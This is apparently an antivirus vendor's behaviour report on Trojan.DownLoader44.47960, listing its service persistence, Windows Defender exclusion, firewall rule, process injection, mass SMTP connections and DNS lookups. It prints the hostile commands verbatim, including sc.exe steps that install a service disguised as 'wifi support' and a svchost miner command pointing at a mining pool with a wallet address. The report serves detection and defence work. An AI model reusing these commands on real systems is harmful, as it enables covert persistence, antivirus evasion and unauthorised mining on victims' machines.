Trojan.DownLoader44.47960

Technical Information

To ensure autorun and distribution

Sets the following service settings

[<HKLM>\System\CurrentControlSet\Services\meujtone] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\meujtone] 'ImagePath' = '%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d"<Full path to file>"'
[<HKLM>\SYSTEM\CurrentControlSet\services\meujtone] 'ImagePath' = '%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe'

Creates the following services

'meujtone' %WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d"<Full path to file>"
'meujtone' %WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion with following registry keys:

[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\meujtone' = '00000000'

Executes the following

'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul

Injects code into

the following system processes:

%WINDIR%\syswow64\svchost.exe

Modifies file system

Creates the following files

%TEMP%\uzbtwrxh.exe
%WINDIR%\syswow64\config\systemprofile:.repos

Moves the following files

from %TEMP%\uzbtwrxh.exe to %WINDIR%\syswow64\meujtone\uzbtwrxh.exe

Deletes itself.

Network activity

Connects to

'mi##########m.mail.protection.outlook.com':25
'mx.####o.locaweb.com.br':25
'mx####.carrierzone.com':25
'mx.#p.pl':25
'sl###.#rg.1.arsmtp.com':25
'ma##.#elkomsa.net':25
'm.###tube.com':443
'he#####olicy.usc.edu':443
'mt##.##0.yahoodns.net':25
'in###gram.com':443
'mx.##wered.name':25
'mx.###eric-isp.com':25
'sm##.#opmail.com':25
'ma##.poczta.pl':25
'mx##.mb5p.com':25
'mx##.###us-vadesecure.net':25
'sm#####.hosting.orange.pl':25
'it#####2.itscomp.com':25
'ma##.#-email.net':25
're###1.gse.it':25
'ma###.mail-vert.fr':25
'mx#.free.fr':25
'31.#3.64.52':443
'mx#.owt.com':25
'mx.###zta.onet.pl':25
'mx.#len.pl':25
'ma##.#qeumco.com':25
'ma##.#nwiredbb.com':25
'15#.#40.201.174':443
'ul######.##il.protection.outlook.com':25
'mx#.#mpal.com':25
'ma##.#upereva.it':25
'10#.#62.165.235':443
'mx#.###-sd.iphmx.com':25
'mx#######703.gslb.pphosted.com':25
'mx.###-group.com':25
'mx#######f01.gslb.pphosted.com':25
'mx#.#anmail.net':25
'mx#######b02.gslb.pphosted.com':25
'ma###.eircom.net':25
'sk##nks.com':25
'sm#####x.turknet.net.tr':25
'ma##.#eranit.com.tr':25
'mx.###yamzone.com':25
'sm##.##cureserver.net':25
'gw.##odvian.com':25
'mx.#####.#e.cust.b.hostedemail.com':25
'mx#.##tsolmail.net':25
'mx###.mb1p.com':25
'mx###.##tsol.xion.oxcs.net':25
'na#.###.#rotection.outlook.com':25
'mx#######c01.gslb.pphosted.com':25
'cl#####6.netcore.co.in':25
'ma###.#orpmailsvcs.com':25
'mx.###cali.co.uk':25
'cm######1.mail.tiscali.it':25
'ma##.#ailerhost.net':25
'ws#.edu':443
'15#.#40.201.63':443
'mx######-com.icoremail.net':25
'xm###chool.cf':2222
'ma###.##mebrightmail.com':25
'fm##ers.com':25
'ma##.#onglom.com':25
'es##.##ntas.iphmx.com':25
'mx.##.#tinternet.com':25
'mx#######e01.gslb.pphosted.com':25
'fw####.servlinks.com':25
'mx#######101.gslb.pphosted.com':25
'mx#######.mail.am0.yahoodns.net':25
'mx####.##il.gm0.yahoodns.net':25
'mx#######e02.gslb.pphosted.com':25
'mx#######a01.gslb.pphosted.com':25
'al######x-vip1.prodigy.net':25
'mx#######b01.gslb.pphosted.com':25
'mx#######602.gslb.pphosted.com':25
'fm######01.emirates.net.ae':25
'cc#.#pamfree.cz':25
'_d####.####f04adb09.own-initiative.com':25
'mx.####gnerclosets.com':25
'mx######91d01.pphosted.com':25
'mx##.#-online.de':25
'mx#######502.gslb.pphosted.com':25
'mx#######501.gslb.pphosted.com':25
'ma##.#nowroute.com':25
'mx##.##il.icloud.com':25
'aspmx.l.google.com':25
'un###v8.un.org':25
'62.##4.41.45':486
'ni###eimr.cn':443
'mx#.#harter.net':25
'mx###.comcast.net':25
'mx#.#vinf.com':25
'po####afabrics.com':25
'sm###in.sfr.fr':25
'd1######.#ss.barracudanetworks.com':25
'mc######.mx.a.cloudfilter.net':25
'ma#####ter.fast.net.uk':25
'mx###.##stedmxserver.com':25
'mx##.mail.com':25
'sm###.#ail.medcity.net':25
'mx.#####.#om.cust.b.hostedemail.com':25
'google.com':80
'62.##4.41.49':430
'62.##4.41.50':430
'91.#43.33.5':430
'62.##4.41.48':430
'62.##4.41.47':430
'62.##4.41.46':430
'pu######1.mail2world.com':25
'mx.##teria.pl':25
'ma###esia.com':25
'mx.####oupecuador.com':25
'em##.freenet.de':25
'sm###.#rvatskamail.com':25
'mx.###l-data.net':25
'cx#.##.#.cloudfilter.net':25
'mx#.#eznam.cz':25
'gl####nsecurity.com':25
'ma###.#ailinator.com':25
'in#######.exchangedefender.com':25
'mx.##a.untd.com':25
'i7##.###lsecurity-nec.jp':25

TCP

HTTP GET requests

http://www.google.com/

Other

'ni###eimr.cn':443
'gl####nsecurity.com':25
'm.###tube.com':443
'fm##ers.com':25
'he#####olicy.usc.edu':443
'mt##.##0.yahoodns.net':25
'mx####.carrierzone.com':25
'in###gram.com':443
'ma##.poczta.pl':25
'sm##.#opmail.com':25
'_d####.####f04adb09.own-initiative.com':25
'it#####2.itscomp.com':25
'al######x-vip1.prodigy.net':25
'ma##.#-email.net':25
'mx.###eric-isp.com':25
'91.#43.33.5':430
'po####afabrics.com':25
'mx#.#anmail.net':25
'gw.##odvian.com':25
'sm#####x.turknet.net.tr':25
'alt1.aspmx.l.google.com':25
'alt2.aspmx.l.google.com':25
'mx#.##tsolmail.net':25
're###1.gse.it':25
'sl###.#rg.1.arsmtp.com':25
'cd#.#eb.wsu.edu':443
'cm######1.mail.tiscali.it':25
'ws#.edu':443
'15#.#40.201.63':443
'ul######.##il.protection.outlook.com':25
'15#.#40.201.174':443
'cl#####6.netcore.co.in':25
'xm###chool.cf':2222
'mx#.owt.com':25
'31.#3.64.52':443
'mx.###zta.onet.pl':25
'mx#######b01.gslb.pphosted.com':25
'62.##4.41.45':486
'aspmx.l.google.com':25
'ma##.#nowroute.com':25
'mx####.##il.gm0.yahoodns.net':25
'mx#######a01.gslb.pphosted.com':25
'mx#.###-sd.iphmx.com':25
'mx#######.mail.am0.yahoodns.net':25
'mx#.#eznam.cz':25
'fw####.servlinks.com':25
'ma##.#onglom.com':25
'es##.##ntas.iphmx.com':25
'in#######.exchangedefender.com':25
'ma###.#ailinator.com':25
'mx.##.#tinternet.com':25
'na#.###.#rotection.outlook.com':25
'sm###.#rvatskamail.com':25
'pu######1.mail2world.com':25
'mx.##teria.pl':25
'ma##.#nwiredbb.com':25
'mx######-com.icoremail.net':25
'ma###.##mebrightmail.com':25
'ma#####ter.fast.net.uk':25
'mx#.#vinf.com':25
'ma###esia.com':25
'mx###.##stedmxserver.com':25
'mx.###l-data.net':25
'62.##4.41.49':430
'62.##4.41.50':430
'62.##4.41.48':430
'62.##4.41.47':430
'62.##4.41.46':430
'd1######.#ss.barracudanetworks.com':25
'10#.#62.165.235':443

UDP

DNS ASK mi##########m.mail.protection.outlook.com
DNS ASK mx.###eric-isp.com
DNS ASK ro###tmail.com
DNS ASK mt##.##0.yahoodns.net
DNS ASK ne####essman.com
DNS ASK mx.##wered.name
DNS ASK in###gram.com
DNS ASK ju###fou.com
DNS ASK he#####olicy.usc.edu
DNS ASK m.###tube.com
DNS ASK li###pand.org
DNS ASK te###msa.net
DNS ASK ma##.#elkomsa.net
DNS ASK vp.pl
DNS ASK sl##c.org
DNS ASK wp.pl
DNS ASK mx.#p.pl
DNS ASK nt##os.net
DNS ASK mx####.carrierzone.com
DNS ASK gl##o.com
DNS ASK mx.####o.locaweb.com.br
DNS ASK xm###chool.cf
DNS ASK ul##h.ca
DNS ASK ul######.##il.protection.outlook.com
DNS ASK fr##mail.it
DNS ASK ma##.#upereva.it
DNS ASK po###a.onet.pl
DNS ASK sm##.#opmail.com
DNS ASK vi###mail.com
DNS ASK sl###.#rg.1.arsmtp.com
DNS ASK ws#.edu
DNS ASK po##ta.pl
DNS ASK o2.pl
DNS ASK mx.#len.pl
DNS ASK on#t.pl
DNS ASK mx.###zta.onet.pl
DNS ASK cr####oleman.com
DNS ASK mx#.owt.com
DNS ASK on##ne.fr
DNS ASK mx#.free.fr
DNS ASK op.pl
DNS ASK or##ga.fr
DNS ASK ma###.mail-vert.fr
DNS ASK gs#.it
DNS ASK re###1.gse.it
DNS ASK gm##ln.com
DNS ASK ma##.#-email.net
DNS ASK ma###agent.com
DNS ASK it##omp.com
DNS ASK it#####2.itscomp.com
DNS ASK or##ge.pl
DNS ASK sm#####.hosting.orange.pl
DNS ASK pe###epc.com
DNS ASK mx##.###us-vadesecure.net
DNS ASK ti##jo.com
DNS ASK ho##ail.com
DNS ASK mx##.mb5p.com
DNS ASK ma##.poczta.pl
DNS ASK no#s.fr
DNS ASK yo##ail.com
DNS ASK mx#.#eznam.cz
DNS ASK cp#.org
DNS ASK mx.###yamzone.com
DNS ASK se##nit.com
DNS ASK ma##.#eranit.com.tr
DNS ASK sh#####evelopers.com
DNS ASK tu##.net
DNS ASK sm#####x.turknet.net.tr
DNS ASK sk##nks.com
DNS ASK ei##om.net
DNS ASK ma###.eircom.net
DNS ASK ta##et.com
DNS ASK mx#######b02.gslb.pphosted.com
DNS ASK le#.com
DNS ASK ha##ail.net
DNS ASK ma##.#ailerhost.net
DNS ASK mx#.#anmail.net
DNS ASK mx#######f01.gslb.pphosted.com
DNS ASK wa###roup.com
DNS ASK mx.###-group.com
DNS ASK gh#.org
DNS ASK mx#######703.gslb.pphosted.com
DNS ASK sy##hes.com
DNS ASK mx#.###-sd.iphmx.com
DNS ASK ai##z.co.nz
DNS ASK ts###ha.co.jp
DNS ASK i7##.###lsecurity-nec.jp
DNS ASK em##l.com
DNS ASK sa###mzone.com
DNS ASK sm##.##cureserver.net
DNS ASK sh####travel.com
DNS ASK sa#####rivastava.com
DNS ASK it###ogroup.com
DNS ASK cd#.#eb.wsu.edu
DNS ASK cm######1.mail.tiscali.it
DNS ASK ti###li.co.uk
DNS ASK mx.###cali.co.uk
DNS ASK pr#####sive-medical.com
DNS ASK ma###.#orpmailsvcs.com
DNS ASK ra####studio.com
DNS ASK ra##ik.net
DNS ASK cl#####6.netcore.co.in
DNS ASK dw#.co.uk
DNS ASK mx#######c01.gslb.pphosted.com
DNS ASK wi###wslive.com
DNS ASK ma##.#qeumco.com
DNS ASK na#.###.#rotection.outlook.com
DNS ASK nu###icable.fr
DNS ASK mx###.##tsol.xion.oxcs.net
DNS ASK mx###.mb1p.com
DNS ASK gt##inc.com
DNS ASK mx#.##tsolmail.net
DNS ASK ha##sco.com
DNS ASK alt2.aspmx.l.google.com
DNS ASK ly##s.de
DNS ASK mx.#####.#e.cust.b.hostedemail.com
DNS ASK ho###ian.com
DNS ASK gw.##odvian.com
DNS ASK sa###mjain.com
DNS ASK alt1.aspmx.l.google.com
DNS ASK ra###oup.com
DNS ASK ka###ail.com
DNS ASK sa###m.co.uk
DNS ASK eq##mco.com
DNS ASK ma##.#nwiredbb.com
DNS ASK le###renet.com
DNS ASK ei#.ae
DNS ASK fm######01.emirates.net.ae
DNS ASK e-##s.com
DNS ASK mx#######b01.gslb.pphosted.com
DNS ASK do##app.in
DNS ASK at#.net
DNS ASK al######x-vip1.prodigy.net
DNS ASK ca###ianbct.com
DNS ASK mx#######a01.gslb.pphosted.com
DNS ASK cn#.com
DNS ASK mx#######e02.gslb.pphosted.com
DNS ASK ve##zon.net
DNS ASK mx####.##il.gm0.yahoodns.net
DNS ASK ro##rs.com
DNS ASK mx#######.mail.am0.yahoodns.net
DNS ASK fe##ish.com
DNS ASK cb#.com
DNS ASK mx#######101.gslb.pphosted.com
DNS ASK fi###ambank.com
DNS ASK mx#######e01.gslb.pphosted.com
DNS ASK ch##tva.com
DNS ASK fw####.servlinks.com
DNS ASK bt###ernet.com
DNS ASK mx.##.#tinternet.com
DNS ASK ci##as.com
DNS ASK os##.net
DNS ASK at##s.cz
DNS ASK mx#######602.gslb.pphosted.com
DNS ASK cc#.#pamfree.cz
DNS ASK _d####.####f04adb09.own-initiative.com
DNS ASK 19#.###.211.95.in-addr.arpa
DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
DNS ASK 19#.###.#11.95.bl.spamcop.net
DNS ASK 19#.###.#11.95.zen.spamhaus.org
DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
DNS ASK 19#.###.#11.95.cbl.abuseat.org
DNS ASK un.org
DNS ASK un###v8.un.org
DNS ASK ou####eindia.com
DNS ASK aspmx.l.google.com
DNS ASK ic##ud.com
DNS ASK mx##.##il.icloud.com
DNS ASK dj####entific.com
DNS ASK es##.##ntas.iphmx.com
DNS ASK mx#.#mpal.com
DNS ASK ma##.#nowroute.com
DNS ASK mx#######501.gslb.pphosted.com
DNS ASK ve##ion.net
DNS ASK sl#.com
DNS ASK mx#######502.gslb.pphosted.com
DNS ASK t-##line.de
DNS ASK mx##.#-online.de
DNS ASK be###outh.com
DNS ASK mx######91d01.pphosted.com
DNS ASK de####erclosets.com
DNS ASK mx.####gnerclosets.com
DNS ASK da###lhai.com
DNS ASK ow####itiative.com
DNS ASK ni###eimr.cn
DNS ASK am###trade.com
DNS ASK ae#.com
DNS ASK co###cola.com
DNS ASK ma##.#onglom.com
DNS ASK ly##s.com
DNS ASK mx.#####.#om.cust.b.hostedemail.com
DNS ASK hc####lthcare.com
DNS ASK sm###.#ail.medcity.net
DNS ASK ma##.com
DNS ASK mx##.mail.com
DNS ASK re####-for-kids.com
DNS ASK mx###.##stedmxserver.com
DNS ASK fa###et.co.uk
DNS ASK ma#####ter.fast.net.uk
DNS ASK mc##i.com
DNS ASK pg.com
DNS ASK mc######.mx.a.cloudfilter.net
DNS ASK d1######.#ss.barracudanetworks.com
DNS ASK mo###onet.fr
DNS ASK sm###in.sfr.fr
DNS ASK iv##f.com
DNS ASK mx#.#vinf.com
DNS ASK ne###ape.net
DNS ASK ne##ero.com
DNS ASK mx.##a.untd.com
DNS ASK de##ja.com
DNS ASK ma###.##mebrightmail.com
DNS ASK ch##a.com
DNS ASK mx######-com.icoremail.net
DNS ASK in##ria.pl
DNS ASK fr####erpower.com
DNS ASK em##l.cz
DNS ASK google.com
DNS ASK pu######1.mail2world.com
DNS ASK ma###todd.com
DNS ASK ch##ter.net
DNS ASK mx#.#harter.net
DNS ASK pl#.net
DNS ASK po####afabrics.com
DNS ASK co##ast.net
DNS ASK mx###.comcast.net
DNS ASK co###ctapps.com
DNS ASK in#######.exchangedefender.com
DNS ASK gl####nsecurity.com
DNS ASK ma###nator.com
DNS ASK ma###.#ailinator.com
DNS ASK fm##ers.com
DNS ASK se##am.cz
DNS ASK co###y.edu.co
DNS ASK co#.net
DNS ASK pa###lly.com
DNS ASK mx.###l-data.net
DNS ASK hr####kamail.com
DNS ASK sm###.#rvatskamail.com
DNS ASK ex##te.com
DNS ASK fr##net.de
DNS ASK em##.freenet.de
DNS ASK ac####pecuador.com
DNS ASK mx.####oupecuador.com
DNS ASK ma###esia.com
DNS ASK in##ria.eu
DNS ASK co##lom.com
DNS ASK mx.##teria.pl
DNS ASK cx#.##.#.cloudfilter.net
DNS ASK se###u-inc.com

Miscellaneous

Creates and executes the following

'%WINDIR%\syswow64\meujtone\uzbtwrxh.exe' /d"<Full path to file>"
'%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\meujtone\' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\uzbtwrxh.exe" %WINDIR%\SysWOW64\meujtone\' (with hidden window)
'%WINDIR%\syswow64\sc.exe' create meujtone binPath= "%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
'%WINDIR%\syswow64\sc.exe' description meujtone "wifi internet conection"' (with hidden window)
'%WINDIR%\syswow64\sc.exe' start meujtone' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\meujtone\
'%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\uzbtwrxh.exe" %WINDIR%\SysWOW64\meujtone\
'%WINDIR%\syswow64\sc.exe' create meujtone binPath= "%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
'%WINDIR%\syswow64\sc.exe' description meujtone "wifi internet conection"
'%WINDIR%\syswow64\sc.exe' start meujtone
'%WINDIR%\syswow64\svchost.exe'
'%WINDIR%\syswow64\svchost.exe' -o xmr-school.cf:2222 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+50000 -p x -k -a cn/half

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней